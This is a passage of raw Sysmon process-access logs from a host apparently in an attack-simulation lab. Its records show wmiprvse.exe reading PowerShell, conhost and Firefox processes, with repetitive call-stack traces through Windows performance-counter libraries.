Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150965Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150964Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150963Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150962Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150961Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150960Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150959Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150958Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150957Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150956Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150955Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150954Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150953Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150952Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150951Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.501{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150950Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 